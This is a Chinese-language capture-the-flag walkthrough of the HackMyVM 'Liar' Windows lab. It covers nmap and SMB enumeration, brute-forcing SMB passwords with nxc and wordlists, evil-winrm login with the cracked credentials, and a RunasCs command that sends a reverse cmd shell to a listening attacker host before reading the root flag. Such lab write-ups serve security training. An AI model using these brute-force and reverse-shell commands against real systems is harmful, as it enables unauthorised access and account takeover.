5.1 信息打点
nmap -sS 192.168.53.131 -p- -T4
![图片[1]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020134515513.png?imageSlim)
这里有一个用户名nica
![图片[2]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020133727301.png?imageSlim)
使用nmap进行详细的端口扫描
nmap -sS 192.168.53.131 -p 80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677 -T4 -A
![图片[3]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020134604547.png?imageSlim)
5.2 enum4linux枚举
使用enum4linux-ng枚举目标系统信息,smb服务器开启
enum4linux-ng -A 192.168.53.131 -C
![图片[4]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020134945261.png?imageSlim)
尝试免密登录,登录失败了
smbclient -L //192.168.53.131/ -N
这个免密登录 -N参数就代表着: “空用户名 + 空密码” 的身份,在 Windows 系统中对应的就是
anonymous用户也就是相当于你执行了命令 smbclient -L \192.168.56.114 -U anonymous
![图片[5]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020135750834.png?imageSlim)
5.3 nxc内网渗透
使用smb爆破
nxc smb 192.168.53.131 -u nica -p /usr/share/wordlists/metasploit/burnett_top_1024.txt
![图片[6]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020135943159.png?imageSlim)
爆破结果nica:hardcore,使用账号密码登录smb服务器
![图片[7]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020135710869.png?imageSlim)
从当前操作结果来看,nica 用户虽然凭据有效(能登录 IPC$),但权限较低,无法访问 C$、ADMIN$ 等敏感共享
![图片[8]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020135857048.png?imageSlim)
5.4 远程连接
5985端口开启 ,使用windows版本的ssh连接此服务,可以看到能正常执行命令,登录成功
evil-winrm -i 192.168.53.131 -u nica -p hardcore
![图片[9]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020140544474.png?imageSlim)
看看有哪些用户,大概率就是akanksha用户继续获得其他信息了
![图片[10]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020140731967.png?imageSlim)
继续爆破
nxc smb 192.168.53.131 -u akanksha -p /usr/share/wordlists/rockyou.txt
![图片[11]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020141336892.png?imageSlim)
这也是一个低权限用户
![图片[12]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020141509267.png?imageSlim)
这里就连接不上了
evil-winrm -i 192.168.53.131 -u akanksha -p sweetgirl
![图片[13]-HackMyVm-Liar :简单-泷羽Sec](https://md-1312988675.cos.ap-nanjing.myqcloud.com/myImg/image-20251020141653793.png?imageSlim)
5.5 RunasCs提权
那么我们使用工具https://github.com/antonioCoco/RunasCs
以指定用户权限执行命令
*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe
Info: Uploading /root/Desktop/RunasCs.exe to C:\Users\nica\RunasCs.exe
Data: 68948 bytes of 68948 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nica> dir
Directorio: C:\Users\nica
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 9:12 AM Desktop
d-r--- 9/26/2023 6:44 PM Documents
d-r--- 9/15/2018 9:12 AM Downloads
d-r--- 9/15/2018 9:12 AM Favorites
d-r--- 9/15/2018 9:12 AM Links
d-r--- 9/15/2018 9:12 AM Music
d-r--- 9/15/2018 9:12 AM Pictures
d----- 9/15/2018 9:12 AM Saved Games
d-r--- 9/15/2018 9:12 AM Videos
-a---- 7/14/2024 10:49 PM 51712 RunasCs.exe
-a---- 9/26/2023 6:44 PM 10 user.txt
*Evil-WinRM* PS C:\Users\nica> ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.53.51:4567
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2922e6$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2496 created in background.
> nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.53.51] from (UNKNOWN) [192.168.53.131] 49674
Microsoft Windows [Versi�n 10.0.17763.107]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>
成功弹回了shell
C:\Users>whoami /groups
whoami /groups
INFORMACI�N DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
============================================ ============== ============================================== ========================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
WIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\INTERACTIVE Grupo conocido S-1-5-4 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESI�N EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa��a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci�n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta S-1-16-8192
所属组是Idministritirs也就是Administrator
C:\Users\Administrador>dir
dir
El volumen de la unidad C no tiene etiqueta.
El n�mero de serie del volumen es: 26CD-AE41
Directorio de C:\Users\Administrador
26/09/2023 18:36
.
26/09/2023 18:36
..
26/09/2023 15:11
3D Objects
26/09/2023 15:11
Contacts
26/09/2023 15:11
Desktop
26/09/2023 15:11
Documents
26/09/2023 15:11
Downloads
26/09/2023 15:11
Favorites
26/09/2023 15:11
Links
26/09/2023 15:11
Music
26/09/2023 15:24 16.418 new.cfg
26/09/2023 15:11
Pictures
26/09/2023 18:36 13 root.txt
26/09/2023 15:11
Saved Games
26/09/2023 15:11
Searches
26/09/2023 15:11
Videos
2 archivos 16.431 bytes
14 dirs 45.911.502.848 bytes libres
C:\Users\Administrador>type root.txt
type root.txt
HMV1******
往期推荐
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
新版BurpSuite v2025.6.3汉化版,附激活教程
重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器
FeatherScan v4.0 – 一款Linux内网全自动信息收集工具
近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等
内网渗透必备,microsocks,一个轻量级的socks代理工具
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
内网渗透必备,microsocks,一个轻量级的socks代理工具
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!
DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!














暂无评论内容